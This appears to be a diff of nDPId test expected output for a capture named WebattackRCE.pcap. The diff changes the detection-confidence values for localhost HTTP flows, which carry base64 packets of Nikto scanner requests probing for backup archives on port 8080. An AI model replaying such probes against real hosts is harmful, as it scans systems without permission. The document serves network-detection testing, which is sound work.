00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 